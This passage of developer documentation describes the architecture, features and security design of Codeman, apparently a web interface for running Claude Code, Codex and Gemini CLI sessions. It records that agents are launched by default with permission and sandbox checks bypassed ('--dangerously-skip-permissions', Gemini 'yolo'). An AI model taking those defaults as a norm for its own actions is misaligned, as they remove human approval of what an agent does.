| **Infra** | `src/hooks-config.ts`, `src/push-store.ts`, `src/tunnel-manager.ts`, `src/image-watcher.ts`, `src/file-stream-manager.ts`, `src/remote-hosts.ts` (remote SSH hosts/cases — see Key Patterns) | |
|
||||
| **Search** | `src/search-service.ts` | Pure in-memory core for `GET /api/search` — see Key Patterns |
|
||||
| **Attachments** | `src/attachment-registry.ts`, `src/attachment-magic.ts`, `src/generated-artifact-attachments.ts` (Codex `Saved to:` artifacts), `src/session-attachment-history.ts`, `src/document-preview-cache.ts`, `src/document-thumbnailer.ts`, `src/document-conversion-limiter.ts`, `src/config/attachment-guard.ts` | See Key Patterns |
|
||||
| **Plan** | `src/plan-orchestrator.ts`, `src/prompts/*.ts`, `src/templates/` (`claude-md.ts` + `case-template.md`, the CLAUDE.md scaffold generated into new cases) | |
|
||||
| **Web** | `src/web/server.ts` ★, `src/web/sse-events.ts`, `src/web/routes/*.ts` (18 route modules + barrel; `session-routes.ts` ★), `src/web/route-helpers.ts`, `src/web/ports/*.ts`, `src/web/middleware/auth.ts`, `src/web/schemas.ts`, `src/web/self-update.ts`, `src/web/plan-usage-latest.ts`, `src/web/ws-connection-registry.ts` (per-tab WS supersede), `src/web/heic-jpeg-converter.ts` + `heic-jpeg-worker.ts` (HEIC→JPEG off-thread) | |
|
||||
| **Frontend** | `src/web/public/app.js` (~4K lines, core) + 6 infra modules (`constants.js`, `mobile-handlers.js`, `voice-input.js`, `notification-manager.js`, `keyboard-accessory.js`, `sanitize-html.js` — DOMPurify mXSS allowlist, COD-56) + 9 domain modules (`terminal-ui.js`, `respawn-ui.js`, `ralph-panel.js`, `orchestrator-panel.js`, `ultracode-panel.js`, `cron-ui.js`, `settings-ui.js`, `panels-ui.js`, `session-ui.js`) + 6 feature modules (`ralph-wizard.js`, `api-client.js`, `subagent-windows.js`, `ultracode-windows.js`, `input-cjk.js`, `image-input.js`) + `sw.js` | `ultracode-windows.js` = floating run windows w/ tab connector lines (additional to the dock panel) |
|
||||
| **Types** | `src/types/index.ts` (barrel) → 18 domain files (incl. `workflow-run.ts`, `search.ts`, `cron.ts`); also `src/types.ts` root re-export | See `@fileoverview` in index.ts |
|
||||
|
||||
★ = Large, central file (>50KB) — read its `@fileoverview` first. All files have `@fileoverview` JSDoc — read that before diving in. Discovery aid: `grep -l '@fileoverview' src/web/routes/*.ts` lists all route modules; same grep works for `src/types/`, `src/web/public/*.js`.
|
||||
|
||||
**Local packages**: `packages/xterm-zerolag-input/` — local echo overlay for xterm.js; single-source, bundled to the gitignored `vendor/xterm-zerolag-input.js` and consumed by `app.js` (see Gotchas). `packages/gesture-control/` (`codeman-gesture-control`) — hand-tracking overlay source; built to `src/web/public/gesture/gesture-codeman.js` via `npm run build:gesture` (see Frontend → Gesture control).
|
||||
|
||||
**Config**: `src/config/` — 15 files, no barrel (`index.ts`) exists; import from the specific file.
|
||||
|
||||
**Utilities**: `src/utils/` — re-exported via index. Key: `CleanupManager`, `LRUMap` (⚠ NOT in the barrel — import from `./utils/lru-map.js` directly), `StaleExpirationMap`, `BufferAccumulator`, `stripAnsi`, `Debouncer`, `KeyedDebouncer`. Also: `claude-cli-resolver`/`opencode-cli-resolver`/`codex-cli-resolver`/`gemini-cli-resolver` (CLI path resolution), `string-similarity` (fuzzy matching), `regex-patterns` (ANSI/token/spinner patterns), `assertNever` (exhaustive checks), `token-validation` (auth tokens), `nice-wrapper` (process priority).
|
||||
|
||||
### Data Flow
|
||||
|
||||
1. Session spawns `claude --dangerously-skip-permissions` via node-pty
|
||||
2. PTY output buffered, ANSI stripped, parsed for JSON messages
|
||||
3. WebServer broadcasts to SSE clients at `/api/events`
|
||||
4. State persists to `~/.codeman/state.json` via StateStore
|
||||
|
||||
### Key Patterns
|
||||
|
||||
**Input**: `session.writeViaMux()` for programmatic/curl input — tmux `send-keys -l` (literal) + `send-keys Enter`. Single-line only (fire-and-once). Interactive **browser** input goes through a durable **exactly-once** layer: each frame carries a stable `clientId` + monotonic per-session `seq`, persisted to localStorage until the server ACKs (`{t:'ia',seq}` over WS, or HTTP 2xx), so a dropped link/reconnect can't lose or double-deliver a prompt. **WS resilience** (#149): the upgrade URL carries `cid = clientId + ':' + perTabNonce`, and `ws-connection-registry.ts` supersedes only same-TAB reconnects (two tabs on one session coexist; input frames keep the bare `clientId` for seq dedup); reconnects back off exponentially (attempts preserved across `_connectWs`), and the header connection chip renders from a real `_wsState` lifecycle (`connecting`/`connected`/`fallback`/`reconnecting`/`disconnected`).
|
||||
|
||||
**Idle detection**: Multi-layer (completion message → AI check → output silence → token stability). See `docs/respawn-state-machine.md`.
|
||||
|
||||
**Auto-resume on usage limit** ("token pause" control, opt-in per session, top of the Respawn tab): when Claude halts on a subscription limit ("5-hour limit reached ∙ resets 8pm" and all 1.0.x–2.1.x variants), `usage-limit-patterns.ts` (pure, unit-tested) parses the reset time from cleaned output; `SessionAutoOps` arms a timer for reset+2min, then sends Esc (dismisses the rate-limit dialog) + `continue`. Still-limited responses re-arm the loop (5-min retry on stale times); a `working` transition cancels it. Claude-mode only (detection rides `_processExpensiveParsers`). Persists/recovers via `SessionState.autoResumeEnabled`/`autoResumeAt`; respawn cycles are blocked while paused (`isLimitPaused` guard in `onIdleDetected` — prevents `/clear` from wiping the paused conversation). Endpoint: `POST /api/sessions/:id/auto-resume`; SSE: `session:limitPauseScheduled`/`limitResume`/`limitResumeCancelled`. Tests: `test/usage-limit-patterns.test.ts`, `test/session-auto-resume.test.ts`.
|
||||
|
||||
**Plan-usage chip** (statusLine telemetry, opt-in `showPlanUsageLimits`, default OFF): Claude Code (v2.1.80+) pipes a JSON blob to a configured `statusLine.command` on each render; on Pro/Max it carries a `rate_limits` object (`five_hour`/`seven_day` windows only — no Opus weekly field — each `{used_percentage 0-100, resets_at epoch-SECONDS}`). Codeman injects its OWN statusLine exporter (`generateStatusLineCommand()` in `hooks-config.ts`, identified by the `/api/status-telemetry` marker — it only ever adds/updates/removes a statusLine that is *ours*, never a user's hand-authored one) that POSTs the blob to `POST /api/status-telemetry`. That route (auth-exempt like `/api/hook-event` — localhost-only, hook-secret-gated whenever auth is active, COD-91) parses via `usage-telemetry.ts` (pure, unit-tested), broadcasts SSE `session:statusTelemetry` (de-duped per session by `telemetrySignature` since the statusline fires on every assistant message), and returns a compact plain-text footer for the exporter to **print-through** (so injecting our statusLine doesn't blank the in-terminal footer). `plan-usage-latest.ts` holds the process-wide last value, replayed in the SSE init snapshot (`getLightState`) so the header chip (`#planUsageChip`, toggled by `showPlanUsageLimits` in settings-ui.js) renders immediately on page load / reconnect without per-browser localStorage. Claude-mode only. **Distinct from auto-resume** (which reacts to the limit *message*; this proactively shows the live %). Design: `docs/usage-limits-display-plan.md`. Tests: `test/usage-telemetry.test.ts`.
|
||||
|
||||
**Orchestrator**: State machine that turns a user goal into a phased plan and drives it to completion: `idle → planning → approval → executing → verifying → (replanning) → completed/failed`. `OrchestratorLoop` (engine) delegates plan generation to `orchestrator-planner` and per-phase verification gates to `orchestrator-verifier`, executing phases via team agents/`task-queue`. State persists under the `orchestrator` key in `state.json`. Distinct from Ralph (single-session autonomous loop) — orchestrator coordinates multi-phase, multi-agent execution. See `docs/orchestrator-loop-architecture.md`.
|
||||
|
||||
**Cron (cron-style `CronJob`s)**: saved, named jobs with a recurring schedule (`once`/`interval`/`daily`/`weekly`), enable/disable, Run Now, next-run calc, and per-job run history (`CronJobRun`). ⚠️ **Distinct from the legacy `ScheduledRun`** (`/api/scheduled`, a run-now duration-bounded autonomous loop) — the two never interact; the legacy concept keeps the `Scheduled*` names, the recurring-job feature is `Cron*`. `CronService` (`src/cron/cron-service.ts`) owns CRUD + the 30s background due-tick (`tickDueJobs`, registered via `cleanup.setInterval` in `server.ts`; `init()` recomputes nextRunAt on boot) and **reuses the existing session layer** (create → `addSession` → `setupSessionListeners` → `startInteractive`/`startShell` → prompt via `writeViaMux`/`write`) rather than rebuilding tmux logic. Next-run math is pure/unit-tested in `cron-time.ts` (SERVER-LOCAL timezone for daily/weekly). Dup-launch guard = `lastDueKey` (jobId:fireTime); schedule is advanced BEFORE launch so a slow launch can't re-trigger. `once` jobs self-disable after firing (`completedOnce`). Persisted via `AppState.cronJobs`/`cronJobRuns` (StateStore accessors). Routes `/api/cron/jobs*` + `/api/cron/runs` (`cron-routes.ts`, `CronPort`); schema `CronJobSchema` (cross-field `superRefine`; the `.partial()` update schema does NOT re-run it); SSE `cron:*`. Frontend `cron-ui.js` (#cronModal). Claude/shell/opencode/codex/gemini agent types. Tests: `test/cron-time.test.ts`, `test/cron-service.test.ts`. Design: `docs/cron-discovery.md`.
|
||||
|
||||
**External CLI modes (OpenCode, Codex, Gemini)**: `isExternalCliMode()` in `session.ts` (`mode === 'opencode' || 'codex' || 'gemini'`) gates Claude-specific behavior — Ralph tracker, BashToolParser, token/CLI-info parsing, and ❯-prompt readiness detection are all skipped (these CLIs render their own TUIs; readiness = output stabilization instead). All three modes **require tmux — no direct PTY fallback** — because secrets are injected via `tmux setenv` (socket-scoped `${this.tmux()} setenv`, never on the spawn command line): OpenCode gets `OPENCODE_CONFIG_CONTENT` etc., Codex gets `OPENAI_API_KEY`/`CODEX_API_KEY`/`CODEX_HOME` (`setCodexEnvVars`), Gemini gets `GEMINI_API_KEY`/`GOOGLE_API_KEY`/`GOOGLE_CLOUD_PROJECT`/`GOOGLE_APPLICATION_CREDENTIALS`/`GOOGLE_GENAI_USE_VERTEXAI` etc. (`setGeminiEnvVars`, all in `tmux-manager.ts`). Codex specifics: command built by `buildCodexCommand()` (`--model`, `resume <id>`, `--dangerously-bypass-approvals-and-sandbox` from the `codexConfig` payload / `codexDangerouslyBypassApprovals` app setting; `renderMode` is schema-coerced to `'hybrid'`, the only supported mode). Gemini specifics: command built by `buildGeminiCommand()` (`--skip-trust` always, `--approval-mode <default|auto_edit|yolo|plan>` defaulting to `yolo` for parity with Claude's `--dangerously-skip-permissions`, `--model`, `--resume` from the `geminiConfig` payload); availability via `GET /api/gemini/status` — session/quick-start routes fail with `OPERATION_FAILED` + install hint (`npm install -g @google/gemini-cli`) when missing. Codex AND Gemini export `COLORTERM=truecolor` + unset `NO_COLOR` (other modes unset `COLORTERM`); Gemini joins `isAltScreenStripMode()` (Codex/Claude/Gemini are Ink TUIs that repaint inline → strip alt-screen/`3J` so scrollback survives). Codex availability via `GET /api/codex/status`. Frontend: run-mode dropdown → `runCodex()`/`runGemini()` in `session-ui.js` ("Run CX"/"Run GM" labels), App Settings → Codex CLI tab; Respawn/Ralph options are Claude-only, so session options open on the Summary tab for external CLI sessions. ⚠️ `run*()` MUST unwrap the `{success,data}` envelope (`(await res.json()).data.available` / `data.data.sessionId`) — reading the raw shape silently breaks the run. Tests: `test/run-mode-ui.test.ts` + `test/gemini-mode.test.ts` (vm-sandbox harness, no real DOM).
|
||||
|
||||
**Remote SSH cases** (COD-94/#145): cases can point at a **remote host** (`~/.codeman/remote-hosts.json` + `remote-cases.json` via `src/remote-hosts.ts`; CRUD under `/api/cases` — cases route file). A remote session launches a LOCAL tmux pane running `ssh <host>` that creates a durable REMOTE tmux session on a **dedicated socket** `-L codeman-remote` with name `codeman-ssh-<id>` — deliberately failing the remote Codeman's `SAFE_MUX_NAME_PATTERN` so a Codeman instance on the target host never adopts it; no `-g` global tmux options are set remotely. `remotePath`/`identityFile` are schema-guarded against shell injection (backticks/`$` rejected — same approach as `extraSshOptions`); remote tmux availability is probed via `checkRemoteTmuxAvailable()` in quick-start (ssh args carry `-o ConnectTimeout=10`). Remote claude defaults to `exec claude --dangerously-skip-permissions`; per-host `commands.*` override. Session kill best-effort kills the remote tmux too. `SessionState.remote`/`MuxSession.remote` round-trip through recovery (`restoreMuxSessions` passes `remote` back into the Session constructor). ⚠️ Run flows must route remote cases through `POST /api/quick-start` (which resolves the remote case and skips LOCAL CLI availability gates) — `POST /api/sessions` stat-validates `workingDir` locally and has no `caseName`. `envOverrides`/`effort`/`modelOverride`/`codexConfig`/`geminiConfig` are rejected for remote quick-starts (not silently dropped). UI: Create Case modal → Remote tab. Tests: `test/remote-hosts.test.ts`, `test/remote-ssh-options.test.ts`.
|
||||
|
||||
**Unified session list** (COD-160/#139): `GET /api/sessions/unified?limit=&q=` merges live sessions, persisted state, lifecycle-log history, and Claude transcript files into one deduped list (pure core in `src/services/unified-session-service.ts`). Transcript rows are keyed by conversation UUID and folded into their owning session via a `claudeSessionId → Codeman id` alias map (resumed//clear-respawned sessions must not appear twice); lifecycle name/mode resolution is first-seen-wins (the log returns entries NEWEST-first). No terminal buffers in the response (unlike `/api/sessions`). Consumed by the Cmd+K Session Manager (#146).
|
||||
|
||||
**Hook events**: Claude Code hooks trigger via `/api/hook-event`. Key events: `permission_prompt`, `elicitation_dialog`, `idle_prompt`, `stop`, `teammate_idle`, `task_completed`. See `src/hooks-config.ts`; upstream hook semantics mirrored in `docs/claude-code-hooks-reference.md`.
|
||||
|
||||
**Agent Teams**: `TeamWatcher` polls `~/.claude/teams/`, matches to sessions via `leadSessionId`. Teammates are in-process threads appearing as subagents. Enable: `CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS=1`. See `docs/agent-teams/`.
|
||||
|
||||
**Circuit breaker**: Prevents respawn thrashing. States: `CLOSED` → `HALF_OPEN` → `OPEN`. Reset: `/api/sessions/:id/ralph-circuit-breaker/reset`. **Distinct: PTY-exit breaker** (COD-115/118/#147, `session-pty-exit-breaker.ts`) trips after repeated rapid PTY exits (crash loops on attach), blocks further auto-restarts, broadcasts SSE `session:respawnBreakerTripped` + push (in `PUSH_EVENT_MAP`). Reset ONLY via an explicit `{clearBreaker:true}` body on `POST /api/sessions/:id/interactive` (sent by the user-facing restart control) — the frontend's auto-reattach in `selectSession()` sends no body and must never clear it. Sessions also scrub inherited `TMUX`/`TMUX_PANE` env so Codeman-in-tmux doesn't nest. Tests: `test/respawn-pty-breaker.test.ts`.
|
||||
|
||||
**Full-scrollback replay** (COD-164/#148): `GET /api/sessions/:id/terminal?full=1` returns the ENTIRE tmux scrollback (capture-pane `-e -S -<lines>` bounded by the configured history limit, explicit `maxBuffer` from the terminal-history config, early byte-cap before normalization, CRLF-normalized for shell panes). On success the capture is returned ALONE (`source='mux-full-history'` — it supersedes the byte buffer; no duplication). Only the FIRST buffer load after a page load requests `full=1` (one-shot `_initialFullBufferLoad` flag in app.js); tab switches keep the cheap `?tail=` visible-frame path. Tests: `test/tmux-capture-full-history.test.ts`, `test/tmux-scrollback-eol.test.ts`.
|
||||
|
||||
**Self-update** (App Settings → Updates): in-app updater for **git-clone installs** supervised by systemd/launchd. Supervisors: `systemd` (user unit), `launchd` (GUI LaunchAgent, gui-domain kickstart), `launchd-daemon` (KeepAlive system LaunchDaemon on headless Macs — restarts rootlessly by killing the server PID and letting launchd respawn it; detected only when the daemon is bootstrapped AND KeepAlive), else `none` → "restart manually" message; on next boot a manual-restart status auto-completes when the running version matches the target. The update restarts the very process running it, so the real work runs in a DETACHED `scripts/self-update.sh` (`git checkout <release tag> && npm install && npm run build && restart`) that outlives the restart; it writes progress to `dataPath('update-status.json')`, which the browser polls across the connection drop. Channel = latest `codeman@X.Y.Z` release tag; dirty trees are auto-stashed. `src/web/self-update.ts` splits PURE helpers (semver/tag parsing, reconcile decision — unit-tested) from IO wrappers (`getInstallInfo`/`checkForUpdate`/`startUpdate`/`reconcileUpdateOnBoot`). Routes: `GET /api/system/update/check`, `POST /api/system/update`, `GET /api/system/update/status`. Types: `src/types/update.ts`. npm installs report as non-updatable.
|
||||
|
||||
**Attachments** (live external document references; COD-37/#119 core, COD-38/#120 previews, COD-39/#121 history): all wiring in `file-routes.ts`. **Registry** (`attachment-registry.ts`): an **in-memory** map of a stable `attachmentId` → an absolute, `realpath`-resolved, extension-allowlisted file path, so browser requests (`GET /api/sessions/:id/attachments/:attachmentId/raw`) never carry arbitrary absolute paths; `POST /api/sessions/:id/attachments` registers one. **Magic links** (`attachment-magic.ts`): parses `codeman://attach?...` out of terminal output — ⚠️ this scanner is prompt-injectable, so the scan path is **force-confined to the session workspace** (a hostile prompt could otherwise make it read arbitrary host files over SSE); emits the `attachment:detected` SSE event. Security gate is an extension **allowlist** (`isSupportedAttachmentExtension`, in the registry/magic modules), not a blocklist; a separate path layer (`config/attachment-guard.ts`) confines reads to the workspace (`attachmentConfineToWorkspace`) and blocks sensitive trees (`/root`, `/etc`). **Previews + thumbnails** (COD-38): `:attachmentId/preview` + `:attachmentId/thumbnail` (and the workspace-file equivalents `file-preview`/`file-thumbnail`) render Office docs/PDFs via external converters (`pdftoppm` / LibreOffice `soffice` / Word-COM `powershell`); `document-preview-cache.ts` is a shared disk cache (de-dups *identical* in-flight inputs), `document-thumbnailer.ts` does best-effort first-page images, and `document-conversion-limiter.ts` is a **global converter-spawn concurrency cap** (`runWithConversionLimit`) — without it, N distinct large docs detected at once fork N multi-minute converter processes = a localhost fork-bomb-shaped resource-exhaustion vector. **History drawer** (COD-39): `session-attachment-history.ts` tracks the last `ATTACHMENT_HISTORY_LIMIT` (100) attachments per session (`Session._attachmentHistory`, persisted via `SessionState.attachmentHistory`, replayed so externals re-register on reconnect); `GET /api/sessions/:id/attachments` is the list endpoint. ⚠️ The history drawer's launcher button is desktop-only — hidden on phones (regression-guarded; see `mobile-header-buttons-policy` test). Session-local files keep using the existing workspace-scoped `file-routes` paths; the registry is only for explicit live externals. **Codex generated artifacts** (COD-166/#150, `generated-artifact-attachments.ts`): codex-mode sessions ALSO scan (ANSI-stripped) output for `Saved to: file:///…` lines and surface those files as attachment cards with a relaxed trust policy — the allow decision runs on the **realpath-resolved** path against `os.homedir()`-anchored `~/.codex` marker dirs (symlink escapes fall back to force-confinement); gated to `mode === 'codex'` only (`source` is a REQUIRED param through the listener-deps chain — a dropped arg here silently kills the feature). Image thumbnails pass through jpg/jpeg/gif/webp.
|
||||
|
||||
**Ultracode / Workflow-run visualization** (opt-in `showUltracodeAgents`, default OFF; released 1.1.2): the Workflow tool ("ultracode") writes a COMPLETION artifact per run at `~/.claude/projects/<projHash>/<sessionUuid>/workflows/wf_*.json` (written only at run end); LIVE in-flight runs exist only as transcript dirs at `…/subagents/workflows/wf_<id>/` (journal.jsonl + agent-*.jsonl). `workflow-run-watcher.ts` (STANDALONE — deliberately never imports/touches `subagent-watcher.ts`; separate singleton, though it independently reads the same `subagents/workflows/` tree) scans BOTH sources via periodic poll + per-directory chokidar watchers with per-source mtime skip (LRU agentStatCache + journalCache), synthesizing ACTIVE runs (live per-agent tokens/tools/state from transcripts, title/phases from the workflow script) until the completion `wf_*.json` appears and supersedes, and broadcasts SSE `workflow:run_discovered`/`run_updated`/`run_removed`. The watcher is started when **either** `showUltracodeAgents` **or** `ultracodeFloatingWindows` is on (`server.ts` `isWorkflowAgentTrackingEnabled()` returns `(showUltracodeAgents ?? false) || (ultracodeFloatingWindows ?? false)`). Served via `GET /api/workflows` (optional `?minutes=` filter) and `GET /api/workflows/:runId`. Frontend `ultracode-panel.js` renders a docked master-detail view (LEFT: runs + phases; RIGHT: per-agent tokens + tool-calls; click an agent card → its live transcript via client-side `agentId` join). **Additionally**, `ultracode-windows.js` auto-pops a draggable **floating window per active run** (gated on a **DEDICATED** `ultracodeFloatingWindows` toggle, default OFF — independent of the dock panel's `showUltracodeAgents`; see `_ultracodeFloatingEnabled()`), connected by a glowing line to the originating session tab (resolved by `session.claudeSessionId === run.sessionUuid`) — same line idiom as subagent windows, drawn into the shared `#connectionLines` SVG from the tail of `_updateConnectionLinesImmediate`. The window auto-closes ~8s after its run finishes; explicit dismissals are remembered. Clicking an agent card opens an **in-page** connected transcript window (not a browser popup); both run and transcript windows minimize **into** the originating session tab as a merged `ULTRA` badge (🧬 runs / 📄 transcripts) with a restore/dismiss dropdown — minimized runs are skipped by auto-pop. Gesture beta: floating subagent/ultracode windows are pinch-draggable (a `window` grab kind in `entry.ts`). Types: `src/types/workflow-run.ts`. Config: `src/config/workflow-config.ts`.
|
||||
|
||||
**Cross-session search** (COD-113/#133): `GET /api/search?q=&types=&limit=` federates an **in-memory** search across all live sessions — session metadata (name/workingDir/id), run-summary events, and per-session attachment-history file entries (workspace-relative path only; the server-private `externalPath` is never read). Pure core `searchSources()` in `search-service.ts` (substring-matches with hard per-type caps — no regex, so no ReDoS; no filesystem reads, so no traversal); `harvestSources()` in `search-routes.ts` gathers the in-memory sources. `SearchQuerySchema` bounds `q` (1–200), allowlists `types` (`session,event,file`), clamps `limit` (1–60). Returns the `{success,data}` envelope. Frontend: history-panel search box in `terminal-ui.js`. Types: `src/types/search.ts`.
|
||||
|
||||
**Away digest** (COD-41/#136): `GET /api/away-digest?range=&since=&until=&lastViewed=` aggregates "what happened while you were away" from the lifecycle log + run-summary events + live sessions + daily token stats + recently-completed subagents into needs-attention/completed/still-running/idle/informational sections. Pure aggregator in `web/away-digest.ts` (`resolveAwayDigestRange()` validates the window — `since-last-visit`/`1h`/`today`/`24h`/`custom`, server-local TZ; `buildAwayDigest()` classifies). Header-button modal in `panels-ui.js` (button hidden on phones — regression-guarded). ⚠️ Returns `{success:true,digest}` (a legacy raw-ish shape, consistent with the other raw GET handlers in `system-routes.ts` — `{entries}`/`{config}`/`{files}`/`getSystemStats()`); frontend + tests read `.digest`. Subagent lookback is a fixed 60-min window regardless of range.
|
||||
|
||||
**Ralph todo-config** (COD-79/#135): per-session `maxTodos` (FIFO-eviction cap, default 500 = `MAX_TODOS_PER_SESSION`) + `todoExpirationMinutes` (auto-expiry, default 60) set via `POST /api/sessions/:id/ralph-config` (`RalphConfigSchema`, both `.int().positive()`). Stored on the tracker (`setMaxTodos`/`setTodoExpirationMinutes`) and **persisted/read-back via `RalphTrackerState`** (surfaced in the `loopState` getter → `toState()` + SSE broadcast → modal `populateRalphForm`), mirroring how `maxIterations` round-trips. Claude-only (skipped by `isExternalCliMode`).
|
||||
|
||||
**Port interfaces**: Routes declare dependencies via port interfaces (`src/web/ports/`). Routes use intersection types (e.g., `SessionPort & EventPort`).
|
||||
|
||||
### Frontend
|
||||
|
||||
Frontend JS modules have `@fileoverview` with `@dependency`/`@loadorder` tags. Load order: `constants.js`(1) → `mobile-handlers.js`(2) → `voice-input.js`(3) → `notification-manager.js`(4) → `keyboard-accessory.js`(5) → `input-cjk.js`(5.5) → `sanitize-html.js`(5.6) → `app.js`(6) → `terminal-ui.js`(7) → `respawn-ui.js`(8) → `ralph-panel.js`(9) → `orchestrator-panel.js`(9.5) → `cron-ui.js`(9.7) → `settings-ui.js`(10) → `panels-ui.js`(11) → `ultracode-panel.js`(11.5) → `session-ui.js`(12) → `ralph-wizard.js`(13) → `api-client.js`(14) → `subagent-windows.js`(15) → `ultracode-windows.js`(15.5) → `image-input.js`(16). `input-cjk.js` handles CJK IME composition via an always-visible textarea below the terminal (`window.cjkActive` blocks xterm's onData).
|
||||
|
||||
**Command palette + shortcut registry** (COD-151/153/157/192, #146): `Ctrl/Cmd/Alt+K` opens the session palette (fuzzy search over live sessions; "Browse all sessions" → the Session Manager modal backed by `GET /api/sessions/unified`); the quick-start case `<select>` is fronted by a searchable picker (`buildCasePickerOptions`/`formatCasePickerLabel` — remote cases render `name @ hostId`). Shortcuts live in a rebindable registry (`DEFAULT_SHORTCUTS`/`getShortcutRegistry()`/`matchesShortcutEvent()` in app.js; overrides persist under `settings.shortcutOverrides` via `saveAppSettingsToStorage`); App Settings → Shortcuts renders capture/disable rows; `Ctrl+?` opens the registry-driven overlay (footer links to the full `#helpModal` reference). ⚠️ Palette-chord keys must ALSO be swallowed in `attachCustomKeyEventHandler` (terminal-ui.js) or xterm writes the control byte (0x0B) into the PTY. ⚠️ `saveAppSettings()` rebuilds settings from the DOM — keys edited elsewhere (`shortcutOverrides`, `showTokenCount`, `showCost`) need explicit `_prev` carry-over.
|
||||
|
||||
**WebGL renderer toggle** (#140, `webglRendererEnabled`): per-device (`displayKeys` set, stripped from the server payload — NOT in `SettingsUpdateSchema`, which is `.strict()`). The GPU-stall watchdog's sticky `codeman-webgl-disabled` marker survives page loads; it's cleared only by an explicit OFF→ON save transition or `?webgl=force` (`shouldSkipWebGL` in constants.js). `?nowebgl` still forces the DOM renderer per-load.
|
||||
|
||||
**Z-index layers**: subagent windows (1000), plan agents (1100), mobile/tablet fixed header (1200, `mobile.css`), modals on ≤768px (1300 — must beat the fixed header or the modal close button is buried; bug fixed in `b8cb467`), log viewers (2000), image popups (3000), local echo overlay (7).
|
||||
|
||||
**Multi-monitor button** (header, top-right; the notification bell it sits beside stays hidden — notifications live in Settings → Notifications). `app.launchMultiMonitor()` (in `panels-ui.js`) POSTs `/api/system/span-displays`, which spawns `scripts/span-codeman.sh` — a fresh, maximized browser `--app` window sized to the union of all displays (macOS; needs "Displays have separate Spaces" OFF). Supports the gesture layer's in-page floating session panels dragging across the physical monitor seam. **Opt-in:** hidden by default; enable under App Settings → Display → **Header Displays** ("Multi-monitor Button", `showMultiMonitorButton`). The button carries a `btn-multimonitor--hidden` class in the template; `renderIndexHtml` strips that class at render when the setting is on (a unique class token, not a brittle match on the aria-label/style copy), and `applyHeaderVisibilitySettings()` toggles the same class live on save. Solo (detached) windows hide it via `body.solo-mode`.
|
||||
|
||||
**Response-viewer (eye) button** (header) is likewise **hidden by default** — enable under App Settings → Display → **Response Viewer** (`showResponseViewer`). Works for Claude AND Codex sessions (#152): Codex last-responses are located via a 4-layer rollout resolution under `CODEX_HOME` (history pin → originator match → resume-UUID → cwd fallback with other-pane exclusion), with injected-context filtering and event/legacy dedup — tests in `test/routes/session-routes-codex-last-response.test.ts`. Purely client-side (no `renderIndexHtml` step): the template ships with `btn-response-viewer-header--hidden` and `applyHeaderVisibilitySettings()` (settings-ui.js) toggles it after settings load. Hiding must go through that marker class — the base rule is `display:inline-flex !important`, so an inline style can't override it. `showResponseViewer` is in the `displayKeys` per-device set (settings-ui.js), so it does NOT sync across devices.
|
||||
|
||||
**Gesture control** (the camera hand-tracking overlay) is **opt-in, default OFF**, under App Settings → Display → **Input** (`gestureControlEnabled`). `CODEMAN_GESTURE=1` makes the feature *available* on the instance (CSP widening + `/gesture/` assets) and sets `window.__codemanGestureAvailable` (the Input section only shows when set); the overlay bundle is injected by `renderIndexHtml` **only when the setting is enabled**, so that method is `async` and reads `settings.json` via `readSettings(true)` — the `true` forces a **fresh** read (bypassing the 2s `_settingsCache`), because a post-save reload happens within that TTL and the cached value would otherwise render the pre-toggle state. Toggling the setting reloads the page (the bundle is render-injected).
|
||||
|
||||
**Gesture-control source lives in-repo** at `packages/gesture-control/` (workspace package `codeman-gesture-control`, was the standalone `Ark0N/codeman-gesture-control` repo). The transport-agnostic core is `src/gesture/*` (MediaPipe GestureRecognizer → One-Euro-filtered cursor → pinch state machine); `src/codeman/entry.ts` is the Codeman *consumer* that maps grab/drag/drop onto real `.session-tab`/toolbar buttons and is the bundle entry. **Edit there, then run `npm run build:gesture`** (`scripts/build-gesture-bundle.mjs` → esbuild bundles `entry.ts`, MediaPipe JS included, into `src/web/public/gesture/gesture-codeman.js`) and **commit the regenerated bundle** — the committed bundle is what dev/`tsx` serves (no bundler at runtime), and `scripts/build.mjs` reruns the same step so prod always reflects current source. The MediaPipe **wasm + model** are NOT bundled — loaded at runtime from same-origin `/gesture/wasm` + `/gesture/gesture_recognizer.task`, fetched by `scripts/fetch-gesture-assets.mjs` (gitignored, see Gotchas). `entry.ts` mounts `window.__codemanGesture = new GestureBridge()` idempotently at module-eval. A standalone vite playground (`npm run dev` in the package — fake tabs, no Codeman) lets you iterate on gesture *feel* in isolation. ⚠️ Keep `MP_VERSION` in `fetch-gesture-assets.mjs` in sync with `@mediapipe/tasks-vision` in `packages/gesture-control/package.json`.
|
||||
|
||||
**Theme skins** (App Settings → Display): the `skin` setting selects a palette via a `data-skin` attribute on `<html>`. Values: `daylight-blue` (default), `daylight-green`, `og` (OG Codeman). CSS lives under `[data-skin="…"]` blocks in `styles.css`. To avoid a flash-of-wrong-theme, an **inline pre-paint script** in `index.html` (`<head>`) reads `localStorage['codeman:skin']` and sets `data-skin` before first paint; `settings-ui.js` `applySkin()` applies it live on save (sets `html[data-skin]` + `window.__codemanSkin`, syncs the standalone `codeman:skin` key with the settings blob, and calls terminal-ui.js `applyTerminalSkin()` to re-theme live terminals). `skin` is a **per-device/client-only** setting — it's destructured OUT of the server payload (settings-ui.js, alongside `localEchoEnabled`/`cjkInputEnabled`/`extendedKeyboardBar`), so it does NOT sync across devices.
|
||||
|
||||
**Respawn presets**: `solo-work` (3s/60min), `subagent-workflow` (45s/240min), `team-lead` (90s/480min), `ralph-todo` (8s/480min), `overnight-autonomous` (10s/480min).
|
||||
|
||||
**Keyboard shortcuts**: Escape (close), Ctrl+? (shortcut overlay), Ctrl/Cmd/Alt+K (session palette), Ctrl+W (kill), Ctrl+Tab (next), Alt+[/] (prev/next tab), Alt+1-9 (switch tab), Ctrl+Shift+{/} (move tab left/right), Shift+Enter or Ctrl+Enter (newline), Ctrl+L (clear), Ctrl+Shift+R (restore size), Ctrl+Shift+V (voice input), Ctrl/Cmd +/- (font), Shift+Wheel (local scrollback when mouse passthrough is active). Rebindable via the registry (see Command palette above).
|
||||
|
||||
### Security
|
||||
|
||||
**Full model: [`docs/security-architecture.md`](docs/security-architecture.md)** — network binding, auth pipeline, the tunnel caveat, file-serving hardening, supply-chain, instance isolation, and recommended secure setups.
|
||||
|
||||
| Layer | Details |
|
||||
|-------|---------|
|
||||
| **Auth** | Optional HTTP Basic via `CODEMAN_USERNAME` (defaults to `admin`) / `CODEMAN_PASSWORD` env vars. Active only when `CODEMAN_PASSWORD` is set (`middleware/auth.ts`) |
|
||||
